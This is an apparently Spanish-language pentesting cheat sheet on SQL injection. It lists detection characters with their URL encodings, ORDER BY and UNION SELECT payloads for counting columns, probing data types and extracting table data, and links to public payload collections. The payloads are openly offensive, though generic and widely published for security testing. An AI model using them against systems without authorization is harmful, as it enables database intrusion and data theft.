# SQL injection (SQLi)

## Identificación SQLi <a href="#identificacion-sqli" id="identificacion-sqli"></a>

* <https://github.com/MrW0l05zyn/pentesting/blob/master/web/payloads/sql-injection/common-sqli-payloads.txt>

| Payload | URL Encoded |
| :-----: | :---------: |
|    '    |     %27     |
|    "    |     %22     |
|    #    |     %23     |
|    ;    |     %3B     |
|    )    |     %29     |

## Authentication bypass

* [https://github.com/MrW0l05zyn/pentesting/blob/master/sql-injection/sql-injection-authentication-bypass.txt](https://github.com/MrW0l05zyn/pentesting/blob/master/web/payloads/sql-injection/sql-injection-authentication-bypass.txt)

## Union-based SQLi

### Determinar el número de columnas <a href="#union-based-sqli-determinar-el-numero-de-columnas" id="union-based-sqli-determinar-el-numero-de-columnas"></a>

```sql
ORDER BY 1-- -
ORDER BY 2-- -
ORDER BY 3-- -
```

```sql
UNION SELECT NULL-- -
UNION SELECT NULL,NULL-- -
UNION SELECT NULL,NULL,NULL-- -
```

### Determinar el tipo de dato de cada columna <a href="#union-based-sqli-determinar-el-tipo-de-dato-de-cada-columna" id="union-based-sqli-determinar-el-tipo-de-dato-de-cada-columna"></a>

```sql
UNION SELECT 'a',NULL,NULL-- -
UNION SELECT NULL,'a',NULL-- -
UNION SELECT NULL,NULL,'a'-- -
```

### Obtener información <a href="#union-based-sqli-obtener-informacion" id="union-based-sqli-obtener-informacion"></a>

```sql
UNION SELECT columna1, columna2, columna3 FROM tabla1-- -
UNION ALL SELECT columna1, columna2, columna3 FROM tabla1-- -
```

## Payloads

### FuzzDB <a href="#payloads-fuzzdb" id="payloads-fuzzdb"></a>

* <https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection/detect>

### Payload Box <a href="#payloads-payload-box" id="payloads-payload-box"></a>

* <https://github.com/payloadbox/sql-injection-payload-list>

### Payloads All The Things <a href="#payloads-payloads-all-the-things" id="payloads-payloads-all-the-things"></a>

* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)